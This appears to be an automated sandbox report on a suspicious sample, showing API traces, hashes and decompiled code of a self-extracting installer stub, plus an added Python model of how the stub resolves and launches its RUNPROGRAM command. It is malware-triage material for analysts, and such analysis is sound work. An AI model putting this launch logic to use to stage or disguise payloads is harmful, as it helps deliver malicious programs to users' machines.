                                                                                                                                                                                                    0x00fd3c6e
                                                                                                                                                                                                    0x00fd3c87
                                                                                                                                                                                                    0x00fd3c89
                                                                                                                                                                                                    0x00fd3d4d
                                                                                                                                                                                                    0x00fd3d4f
                                                                                                                                                                                                    0x00fd3d50
                                                                                                                                                                                                    0x00fd3d52
                                                                                                                                                                                                    0x00fd3d9e
                                                                                                                                                                                                    0x00fd3da8
                                                                                                                                                                                                    0x00fd3daf
                                                                                                                                                                                                    0x00fd3db4
                                                                                                                                                                                                    0x00fd3db6
                                                                                                                                                                                                    0x00fd3f4d
                                                                                                                                                                                                    0x00fd3f4d
                                                                                                                                                                                                    0x00fd3f4f
                                                                                                                                                                                                    0x00fd3f56
                                                                                                                                                                                                    0x00fd3f57
                                                                                                                                                                                                    0x00fd3f58
                                                                                                                                                                                                    0x00fd3f63
                                                                                                                                                                                                    0x00fd3f63
                                                                                                                                                                                                    0x00fd3dbc
                                                                                                                                                                                                    0x00fd3dc0
                                                                                                                                                                                                    0x00fd3dc2
                                                                                                                                                                                                    0x00fd3de6
                                                                                                                                                                                                    0x00fd3de6
                                                                                                                                                                                                    0x00fd3de8
                                                                                                                                                                                                    0x00fd3f0b
                                                                                                                                                                                                    0x00fd3f0b
                                                                                                                                                                                                    0x00fd3f0f
                                                                                                                                                                                                    0x00fd3f13
                                                                                                                                                                                                    0x00fd3f15
                                                                                                                                                                                                    0x00fd3f1a
                                                                                                                                                                                                    0x00fd3f1c
                                                                                                                                                                                                    0x00fd3f46
                                                                                                                                                                                                    0x00fd3f47
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3f47
                                                                                                                                                                                                    0x00fd3f1e
                                                                                                                                                                                                    0x00fd3f1f
                                                                                                                                                                                                    0x00fd3f25
                                                                                                                                                                                                    0x00fd3f26
                                                                                                                                                                                                    0x00fd3f2a
                                                                                                                                                                                                    0x00fd3f2d
                                                                                                                                                                                                    0x00fd3fd9
                                                                                                                                                                                                    0x00fd3fd9
                                                                                                                                                                                                    0x00fd3fda
                                                                                                                                                                                                    0x00fd3fda
                                                                                                                                                                                                    0x00fd3fe1
                                                                                                                                                                                                    0x00fd3fe3
                                                                                                                                                                                                    0x00fd3fe3
                                                                                                                                                                                                    0x00fd3fe8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3fe8
                                                                                                                                                                                                    0x00fd3f33
                                                                                                                                                                                                    0x00fd3f37
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3f37
                                                                                                                                                                                                    0x00fd3dee
                                                                                                                                                                                                    0x00fd3dee
                                                                                                                                                                                                    0x00fd3df5
                                                                                                                                                                                                    0x00fd3fad
                                                                                                                                                                                                    0x00fd3fb9
                                                                                                                                                                                                    0x00fd3fc2
                                                                                                                                                                                                    0x00fd3fc8
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3fc8
                                                                                                                                                                                                    0x00fd3dfb
                                                                                                                                                                                                    0x00fd3dfd
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3e03
                                                                                                                                                                                                    0x00fd3e0a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3e15
                                                                                                                                                                                                    0x00fd3e17
                                                                                                                                                                                                    0x00fd3e19
                                                                                                                                                                                                    0x00fd3f94
                                                                                                                                                                                                    0x00fd3fa4
                                                                                                                                                                                                    0x00fd3f7c
                                                                                                                                                                                                    0x00fd3f80
                                                                                                                                                                                                    0x00fd3f8b
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3f8b
                                                                                                                                                                                                    0x00fd3e2c
                                                                                                                                                                                                    0x00fd3e30
                                                                                                                                                                                                    0x00fd3e34
                                                                                                                                                                                                    0x00fd3e36
                                                                                                                                                                                                    0x00fd3f69
                                                                                                                                                                                                    0x00fd3f6e
                                                                                                                                                                                                    0x00fd3f70
                                                                                                                                                                                                    0x00fd3f76
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd3f76
                                                                                                                                                                                                    0x00fd3e3c
                                                                                                                                                                                                    0x00fd3e43
                                                                                                                                                                                                    0x00fd3e47
                                                                                                                                                                                                    0x00fd3e52
                                                                                                                                                                                                    0x00fd3e56
                                                                                                                                                                                                    0x00fd3e5c
                                                                                                                                                                                                    0x00fd3e61
                                                                                                                                                                                                    0x00fd3e68
                                                                                                                                                                                                    0x00fd3e70
                                                                                                                                                                                                    0x00fd3e74
                                                                                                                                                                                                    0x00fd3e7c
                                                                                                                                                                                                    0x00fd3e80
                                                                                                                                                                                                    0x00fd3e82
                                                                                                                                                                                                    0x00fd3e82
                                                                                                                                                                                                    0x00fd3e87
                                                                                                                                                                                                    0x00fd3e87

APIs
• memset.MSVCRT ref: 00FD3C11
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00FD3CDC
  • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46A0
  • Part of subcall function 00FD468F: SizeofResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46A9
  • Part of subcall function 00FD468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00FD46C3
  • Part of subcall function 00FD468F: LoadResource.KERNEL32(00000000,00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46CC
  • Part of subcall function 00FD468F: LockResource.KERNEL32(00000000,?,00FD2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46D3
  • Part of subcall function 00FD468F: memcpy_s.MSVCRT ref: 00FD46E5
  • Part of subcall function 00FD468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00FD46EF
• CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00FD8C42), ref: 00FD3D8F
• GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00FD3E26
• FreeLibrary.KERNEL32(00000000,?,00FD8C42), ref: 00FD3EFF
• LocalFree.KERNEL32(?,?,?,?,00FD8C42), ref: 00FD3F1F
• FreeLibrary.KERNEL32(00000000,?,00FD8C42), ref: 00FD3F40
• LocalFree.KERNEL32(?,?,?,?,00FD8C42), ref: 00FD3F47
• FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00FD8C42), ref: 00FD3F76
• LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00FD8C42), ref: 00FD3F80
• LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00FD8C42), ref: 00FD3FC2
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
• API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
• String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$nst0dum
• API String ID: 1032054927-3080307452
• Opcode ID: 1a01640cfab9113b45fd264706eb40b0dbb18de98d2c17e35d946beb20406186
• Instruction ID: a6bfd0015b4caa3f34561e9c7a6ffe160864d84b5a0893493cc0e8d5a0abe6c4
• Opcode Fuzzy Hash: 1a01640cfab9113b45fd264706eb40b0dbb18de98d2c17e35d946beb20406186
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 51B10071A093099BD3249F748845B2B77E7AB84760F08092BFA85D6390DB75C944FB93
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed / Not Executed (the node colouring of the rendered graph is not recoverable from the text)
Rendered graph of E00FD1AE8, basic blocks fd1ae8-fd1ea4. Blocks that call Win32 APIs: CompareStringA (fd1bd9, fd1d81), GetFileAttributesA (fd1bf7, fd1e0b), LocalAlloc (fd1c50, fd1dbe, fd1df8), GetPrivateProfileIntA and GetPrivateProfileStringA (fd1c79), GetShortPathNameA (fd1d09); the remaining blocks call the sample's internal helpers fd1680, fd16b3, fd171e, fd1781, fd1a84, fd2aac, fd44b9, fd658a, fd66c8 and fd6ce0. The raw node/edge list of the graph widget is omitted here.
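The function decompiled below resolves the program that the self-extractor stub launches (the RUNPROGRAM / POSTRUNPROGRAM directives listed among the String IDs above): it strips a leading quote, tests whether the program token is already an absolute path (X:\ or a UNC \\ prefix), otherwise prefixes the IXP003.TMP extraction directory, and then branches on the extension (.INF, .BAT via "Command.com /c %s", or a plain executable that must exist and must not be a directory). The Python below is an added example, not code from the sample or from the Joe Sandbox report; it mirrors only the branches visible in the decompilation so an analyst can predict the launched command from a RUNPROGRAM value offline. The helper semantics (E00FD1A84 as tokenizer, E00FD66C8 as strrchr, E00FD658A as path append), the exact shape of the .INF and .BAT command lines, and the use of a caller-supplied value in place of GetFileAttributesA are assumptions.

```python
"""Added example (not code from the sample or the Joe Sandbox report):
a Python mirror of the command-resolution logic in the decompiled
E00FD1AE8, to predict what the self-extractor will run for a given
RUNPROGRAM / POSTRUNPROGRAM value without executing the sample.
Only branches visible in the decompilation are modelled; helper
semantics marked 'assumed' are inferred from call shape, not confirmed."""
from __future__ import annotations

from dataclasses import dataclass

# Constructed: the extraction directory as captured in the memory dump
# (the IXP00n.TMP folder created under %TEMP%; user name anonymised).
EXTRACT_DIR = "C:\\Users\\user\\AppData\\Local\\Temp\\IXP003.TMP\\"

# Win32 constants the decompiled code tests against.
INVALID_FILE_ATTRIBUTES = 0xFFFFFFFF   # GetFileAttributesA failure value (-1)
FILE_ATTRIBUTE_DIRECTORY = 0x10


@dataclass
class Resolved:
    kind: str          # "inf", "bat", "exe" or "passthrough"
    target: str        # program path after the absolute/relative decision
    args: str          # remainder of the command string after the program token
    command_line: str  # what ends up in the 0x400-byte output buffer


def split_program_and_args(cmd: str) -> tuple[str, str]:
    """Quote handling from the top of E00FD1AE8: a leading '"' makes '"'
    the delimiter and the token starts one byte in; otherwise the delimiter
    is ' '. E00FD1A84 is assumed to cut the token at the delimiter and
    return a pointer to whatever follows it."""
    if cmd.startswith('"'):
        body, delim = cmd[1:], '"'
    else:
        body, delim = cmd, " "
    end = body.find(delim)
    if end < 0:
        return body, ""
    return body[:end], body[end + 1:].lstrip(" ")


def is_absolute(program: str) -> bool:
    """The inline strlen check (< 3 chars means relative) followed by the
    two byte tests in the listing: 'X:\\' (0x3a, 0x5c) or a UNC '\\\\'."""
    if len(program) < 3:
        return False
    drive = program[1] == ":" and program[2] == "\\"
    unc = program[0] == "\\" and program[1] == "\\"
    return drive or unc


def extension(program: str) -> str:
    """E00FD66C8(str, 0x2e) is assumed to be strrchr('.'); the compare is
    CompareStringA(LOCALE_INVARIANT, NORM_IGNORECASE, ...), hence casefold()."""
    dot = program.rfind(".")
    return program[dot:].casefold() if dot >= 0 else ""


def resolve(cmd: str, file_attributes: int, extract_dir: str = EXTRACT_DIR) -> Resolved:
    """file_attributes stands in for GetFileAttributesA(target), which the
    decompiled code calls on the resolved path; supply the value expected on
    the victim host (offline substitute, not a real Win32 call)."""
    program, args = split_program_and_args(cmd)
    # Relative names are prefixed with the extraction directory (E00FD1781 +
    # E00FD658A in the listing, assumed to be format + path-append).
    target = program if is_absolute(program) else extract_dir + program
    ext = extension(program)
    if ext == ".inf":
        # Branch body lies outside the shown listing; the advpack.dll /
        # DoInfInstall String IDs suggest INF installation (assumption).
        return Resolved("inf", target, args, target)
    if ext == ".bat":
        # "Command.com /c %s" is in the listing; that the resolved path and
        # arguments fill the %s is an assumption.
        line = "Command.com /c " + target + (" " + args if args else "")
        return Resolved("bat", target, args, line)
    if file_attributes == INVALID_FILE_ATTRIBUTES or file_attributes & FILE_ATTRIBUTE_DIRECTORY:
        # Target missing or a directory: the original command string is
        # copied through unchanged (E00FD1680 into the 0x400-byte buffer).
        return Resolved("passthrough", target, args, cmd)
    # Plain executable: resolved path, then " " + arguments if any were given
    # (the two E00FD16B3 calls, assumed to be strncat-like).
    line = target + (" " + args if args else "")
    return Resolved("exe", target, args, line)
```

The passthrough branch is worth noting during triage: when the named program is absent or is a directory, the routine does not fail but hands the literal RUNPROGRAM text on unchanged, so what the later stage receives is whatever the SED author wrote rather than a path under IXP003.TMP.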
C-Code - Quality: 82%
/* Joe Sandbox decompiler output for the command-resolution routine of the self-extractor
   stub (RUNPROGRAM / POSTRUNPROGRAM handling). Comments were added for orientation; the
   E00FD.... helpers are the sample's own CRT-style routines whose bodies are not on this
   page, so their behaviour is inferred from how they are called. __ecx carries the command
   string to resolve. The listing is cut off at the end of this section. */
E00FD1AE8(long __ecx, CHAR** _a4, int* _a8) {
    signed int _v8;          // stack-cookie copy (/GS)
    char _v268;              // 0x104-byte buffer: resolved program path
    char _v527;              // _v528 + 1: program token when the string starts with a quote
    char _v528;              // 0x104-byte buffer: working copy of the command string
    char _v1552;             // 0x400-byte buffer: assembled command line
    CHAR* _v1556;            // program token pointer, updated by E00FD1A84
    int* _v1560;
    CHAR** _v1564;
    void* __ebx;
    void* __edi;
    void* __esi;
    signed int _t48;
    CHAR* _t53;
    CHAR* _t54;
    char* _t57;
    char* _t58;
    CHAR* _t60;
    void* _t62;
    signed char _t65;
    intOrPtr _t76;
    intOrPtr _t77;
    unsigned int _t85;
    CHAR* _t90;
    CHAR* _t92;
    char _t105;
    char _t106;
    CHAR** _t111;
    CHAR* _t115;
    intOrPtr* _t125;
    void* _t126;
    CHAR* _t132;
    CHAR* _t135;
    void* _t138;
    void* _t139;
    void* _t145;
    intOrPtr* _t146;
    char* _t148;
    CHAR* _t151;
    void* _t152;
    CHAR* _t155;
    CHAR* _t156;
    void* _t157;
    signed int _t158;

    _t48 =  *0xfd8004; // 0x42de454f -- __security_cookie value as captured in the dump
    _v8 = _t48 ^ _t158;  // cookie XOR frame pointer, verified on return
    _t108 = __ecx;
    _v1564 = _a4;
    _v1560 = _a8;
    E00FD1680( &_v528, 0x104, __ecx);  // bounded copy of the command string (strncpy-like, inferred)
    if(_v528 != 0x22) {                 // 0x22 = '"': a quoted program name is delimited by the closing quote
        _t135 = " ";
        _t53 =  &_v528;
    } else {
        _t135 = "\"";
        _t53 =  &_v527;                 // skip the opening quote
    }
    _t111 =  &_v1556;
    _v1556 = _t53;
    _t54 = E00FD1A84(_t111, _t135);     // tokenizer (inferred): cuts the token at the delimiter, returns the remainder (arguments)
    _t156 = _v1556;                     // program token
    _t151 = _t54;                       // argument string
    if(_t156 == 0) {
        L12:
        // Relative name: build <extraction dir>\<token>. The directory is a runtime-filled
        // buffer rendered as a literal because the code was decompiled from a memory dump
        // (hence the real sandbox user name, unlike the anonymised String ID above).
        _push(_t111);
        E00FD1781( &_v268, 0x104, _t111, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
        E00FD658A( &_v268, 0x104, _t156);  // path append (inferred)
        goto L13;
    } else {
        _t132 = _t156;
        _t148 =  &(_t132[1]);
        do {                            // inline strlen of the program token
            _t105 =  *_t132;
            _t132 =  &(_t132[1]);
        } while (_t105 != 0);
        _t111 = _t132 - _t148;
        if(_t111 < 3) {                 // too short to be "X:\" or "\\": treat as relative
            goto L12;
        }
        _t106 = _t156[1];
        if(_t106 != 0x3a || _t156[2] != 0x5c) {      // not "X:\" (0x3a = ':', 0x5c = '\')
            if( *_t156 != 0x5c || _t106 != 0x5c) {   // and not a UNC "\\" prefix
                goto L12;
            } else {
                goto L11;
            }
        } else {
            L11:
            E00FD1680( &_v268, 0x104, _t156);        // absolute path: use the token as given
            L13:
            _t138 = 0x2e;                            // '.'
            _t57 = E00FD66C8(_t156, _t138);          // locate the extension (strrchr-like, inferred)
            // CompareStringA(LOCALE_INVARIANT = 0x7f, NORM_IGNORECASE = 1, ...): case-insensitive
            // extension test; it returns CSTR_EQUAL (2) on a match and 0 on failure.
            if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
                _t139 = 0x2e;
                _t115 = _t156;
                _t58 = E00FD66C8(_t115, _t139);
                if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
                    // Generic executable path
                    _t156 = LocalAlloc(0x40, 0x400);  // LPTR (LMEM_FIXED | LMEM_ZEROINIT): output buffer
                    if(_t156 == 0) {
                        goto L43;
                    }
                    _t65 = GetFileAttributesA( &_v268); // executed
                    // INVALID_FILE_ATTRIBUTES (-1) or FILE_ATTRIBUTE_DIRECTORY (0x10):
                    // target missing or a directory, so the original string is passed through unchanged
                    if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
                        E00FD1680( &_v1552, 0x400, _t108);
                    } else {
                        _push(_t115);
                        _t108 = 0x400;
                        E00FD1781( &_v1552, 0x400, _t115,  &_v268);   // command line = resolved path
                        if(_t151 != 0 &&  *_t151 != 0) {              // append " " + arguments if present
                            E00FD16B3( &_v1552, 0x400, " ");           // strncat-like (inferred)
                            E00FD16B3( &_v1552, 0x400, _t151);
                        }
                    }
                    _t140 = _t156;
                     *_t156 = 0;
                    E00FD2AAC( &_v1552, _t156, _t156);   // copy/expand into the LocalAlloc'd buffer (inferred)
                    goto L53;
                } else {
                    // .BAT: the script is run through "Command.com /c %s"; the loop below is an
                    // inline strlen of that format string. The listing continues past this section.
                    _t108 = "Command.com /c %s";
                    _t125 = "Command.com /c %s";
                    _t145 = _t125 + 1;
                    do {
                        _t76 =  *_t125;
                        _t125 = _t125 + 1;
                    } while (_t76 != 0);
                    _t126 = _t125 - _t145;
                                                                                                                                                                                                    								_t146 =  &_v268;
                                                                                                                                                                                                    								_t157 = _t146 + 1;
                                                                                                                                                                                                    								do {
                                                                                                                                                                                                    									_t77 =  *_t146;
                                                                                                                                                                                                    									_t146 = _t146 + 1;
                                                                                                                                                                                                    								} while (_t77 != 0);
                                                                                                                                                                                                    								_t140 = _t146 - _t157;
                                                                                                                                                                                                    								_t154 = _t126 + 8 + _t146 - _t157;
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
                                                                                                                                                                                                    								if(_t156 != 0) {
                                                                                                                                                                                                    									E00FD171E(_t156, _t154, "Command.com /c %s",  &_v268);
                                                                                                                                                                                                    									goto L53;
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								goto L43;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t85 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                    							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t140 = 0x525;
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_push(0x10);
                                                                                                                                                                                                    								_push(0);
                                                                                                                                                                                                    								_t60 =  &_v268;
                                                                                                                                                                                                    								goto L35;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t140 = "[";
                                                                                                                                                                                                    								_v1556 = _t151;
                                                                                                                                                                                                    								_t90 = E00FD1A84( &_v1556, "[");
                                                                                                                                                                                                    								if(_t90 != 0) {
                                                                                                                                                                                                    									if( *_t90 != 0) {
                                                                                                                                                                                                    										_v1556 = _t90;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									_t140 = "]";
                                                                                                                                                                                                    									E00FD1A84( &_v1556, "]");
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    								_t156 = LocalAlloc(0x40, 0x200);
                                                                                                                                                                                                    								if(_t156 == 0) {
                                                                                                                                                                                                    									L43:
                                                                                                                                                                                                    									_t60 = 0;
                                                                                                                                                                                                    									_t140 = 0x4b5;
                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                    									_push(0x10);
                                                                                                                                                                                                    									_push(0);
                                                                                                                                                                                                    									L35:
                                                                                                                                                                                                    									_push(_t60);
                                                                                                                                                                                                    									E00FD44B9(0, _t140);
                                                                                                                                                                                                    									_t62 = 0;
                                                                                                                                                                                                    									goto L54;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									_t155 = _v1556;
                                                                                                                                                                                                    									_t92 = _t155;
                                                                                                                                                                                                    									if( *_t155 == 0) {
                                                                                                                                                                                                    										_t92 = "DefaultInstall";
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									 *0xfd9120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
                                                                                                                                                                                                    									 *_v1560 = 1;
                                                                                                                                                                                                    									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xfd1140, _t156, 8,  &_v268) == 0) {
                                                                                                                                                                                                    										 *0xfd9a34 =  *0xfd9a34 & 0xfffffffb;
                                                                                                                                                                                                    										if( *0xfd9a40 != 0) {
                                                                                                                                                                                                    											_t108 = "setupapi.dll";
                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                    											_t108 = "setupx.dll";
                                                                                                                                                                                                    											GetShortPathNameA( &_v268,  &_v268, 0x104);
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										_push( &_v268);
                                                                                                                                                                                                    										_push(_t155);
                                                                                                                                                                                                    										E00FD171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
                                                                                                                                                                                                    									} else {
                                                                                                                                                                                                    										 *0xfd9a34 =  *0xfd9a34 | 0x00000004;
                                                                                                                                                                                                    										if( *_t155 == 0) {
                                                                                                                                                                                                    											_t155 = "DefaultInstall";
                                                                                                                                                                                                    										}
                                                                                                                                                                                                    										E00FD1680(_t108, 0x104, _t155);
                                                                                                                                                                                                    										_t140 = 0x200;
                                                                                                                                                                                                    										E00FD1680(_t156, 0x200,  &_v268);
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    									L53:
                                                                                                                                                                                                    									_t62 = 1;
                                                                                                                                                                                                    									 *_v1564 = _t156;
                                                                                                                                                                                                    									L54:
                                                                                                                                                                                                    									_pop(_t152);
                                                                                                                                                                                                    									return E00FD6CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    			}
                                                                                                                                                                                                    0x00fd1e12
                                                                                                                                                                                                    0x00fd1e1b
                                                                                                                                                                                                    0x00fd1e73
                                                                                                                                                                                                    0x00fd1e21
                                                                                                                                                                                                    0x00fd1e21
                                                                                                                                                                                                    0x00fd1e28
                                                                                                                                                                                                    0x00fd1e37
                                                                                                                                                                                                    0x00fd1e3e
                                                                                                                                                                                                    0x00fd1e52
                                                                                                                                                                                                    0x00fd1e60
                                                                                                                                                                                                    0x00fd1e60
                                                                                                                                                                                                    0x00fd1e3e
                                                                                                                                                                                                    0x00fd1e79
                                                                                                                                                                                                    0x00fd1e7b
                                                                                                                                                                                                    0x00fd1e84
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1d9b
                                                                                                                                                                                                    0x00fd1d9b
                                                                                                                                                                                                    0x00fd1da0
                                                                                                                                                                                                    0x00fd1da2
                                                                                                                                                                                                    0x00fd1da5
                                                                                                                                                                                                    0x00fd1da5
                                                                                                                                                                                                    0x00fd1da7
                                                                                                                                                                                                    0x00fd1da8
                                                                                                                                                                                                    0x00fd1dac
                                                                                                                                                                                                    0x00fd1dae
                                                                                                                                                                                                    0x00fd1db4
                                                                                                                                                                                                    0x00fd1db7
                                                                                                                                                                                                    0x00fd1db7
                                                                                                                                                                                                    0x00fd1db9
                                                                                                                                                                                                    0x00fd1dba
                                                                                                                                                                                                    0x00fd1dbe
                                                                                                                                                                                                    0x00fd1dc3
                                                                                                                                                                                                    0x00fd1dce
                                                                                                                                                                                                    0x00fd1dd2
                                                                                                                                                                                                    0x00fd1deb
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1df0
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1dd2
                                                                                                                                                                                                    0x00fd1bf7
                                                                                                                                                                                                    0x00fd1bfe
                                                                                                                                                                                                    0x00fd1c07
                                                                                                                                                                                                    0x00fd1d55
                                                                                                                                                                                                    0x00fd1d5a
                                                                                                                                                                                                    0x00fd1d5b
                                                                                                                                                                                                    0x00fd1d5d
                                                                                                                                                                                                    0x00fd1d5e
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1c1b
                                                                                                                                                                                                    0x00fd1c1b
                                                                                                                                                                                                    0x00fd1c20
                                                                                                                                                                                                    0x00fd1c2c
                                                                                                                                                                                                    0x00fd1c33
                                                                                                                                                                                                    0x00fd1c38
                                                                                                                                                                                                    0x00fd1c3a
                                                                                                                                                                                                    0x00fd1c3a
                                                                                                                                                                                                    0x00fd1c40
                                                                                                                                                                                                    0x00fd1c4b
                                                                                                                                                                                                    0x00fd1c4b
                                                                                                                                                                                                    0x00fd1c5d
                                                                                                                                                                                                    0x00fd1c61
                                                                                                                                                                                                    0x00fd1dd4
                                                                                                                                                                                                    0x00fd1dd4
                                                                                                                                                                                                    0x00fd1dd6
                                                                                                                                                                                                    0x00fd1ddb
                                                                                                                                                                                                    0x00fd1ddc
                                                                                                                                                                                                    0x00fd1dde
                                                                                                                                                                                                    0x00fd1d64
                                                                                                                                                                                                    0x00fd1d64
                                                                                                                                                                                                    0x00fd1d67
                                                                                                                                                                                                    0x00fd1d6c
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd1c67
                                                                                                                                                                                                    0x00fd1c67
                                                                                                                                                                                                    0x00fd1c6d
                                                                                                                                                                                                    0x00fd1c72
                                                                                                                                                                                                    0x00fd1c74
                                                                                                                                                                                                    0x00fd1c74
                                                                                                                                                                                                    0x00fd1c8e
                                                                                                                                                                                                    0x00fd1c99
                                                                                                                                                                                                    0x00fd1cc0
                                                                                                                                                                                                    0x00fd1cf8
                                                                                                                                                                                                    0x00fd1d07
                                                                                                                                                                                                    0x00fd1d23
                                                                                                                                                                                                    0x00fd1d09
                                                                                                                                                                                                    0x00fd1d14
                                                                                                                                                                                                    0x00fd1d1b
                                                                                                                                                                                                    0x00fd1d1b
                                                                                                                                                                                                    0x00fd1d2b
                                                                                                                                                                                                    0x00fd1d2d
                                                                                                                                                                                                    0x00fd1d2d
                                                                                                                                                                                                    0x00fd1d38
                                                                                                                                                                                                    0x00fd1d39
                                                                                                                                                                                                    0x00fd1d46
                                                                                                                                                                                                    0x00fd1cc2
                                                                                                                                                                                                    0x00fd1cc2
                                                                                                                                                                                                    0x00fd1ccc
                                                                                                                                                                                                    0x00fd1cce
                                                                                                                                                                                                    0x00fd1cce
                                                                                                                                                                                                    0x00fd1cdb
                                                                                                                                                                                                    0x00fd1ce6
                                                                                                                                                                                                    0x00fd1cee
                                                                                                                                                                                                    0x00fd1cee
                                                                                                                                                                                                    0x00fd1e89
                                                                                                                                                                                                    0x00fd1e91
                                                                                                                                                                                                    0x00fd1e92
                                                                                                                                                                                                    0x00fd1e94
                                                                                                                                                                                                    0x00fd1e97
                                                                                                                                                                                                    0x00fd1ea4
                                                                                                                                                                                                    0x00fd1ea4
                                                                                                                                                                                                    0x00fd1c61
                                                                                                                                                                                                    0x00fd1c07
                                                                                                                                                                                                    0x00fd1bd3
                                                                                                                                                                                                    0x00fd1b7b

APIs
• CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00FD1BE7
• GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00FD1BFE
• LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,?,00000000,00000001,00000000), ref: 00FD1C57
• GetPrivateProfileIntA.KERNEL32 ref: 00FD1C88
• GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00FD1140,00000000,00000008,?), ref: 00FD1CB8
• GetShortPathNameA.KERNEL32 ref: 00FD1D1B
  • Part of subcall function 00FD44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00FD4518
  • Part of subcall function 00FD44B9: MessageBoxA.USER32(?,?,nst0dum,00010010), ref: 00FD4554
Strings
Memory Dump Source
• Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
• Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
Similarity
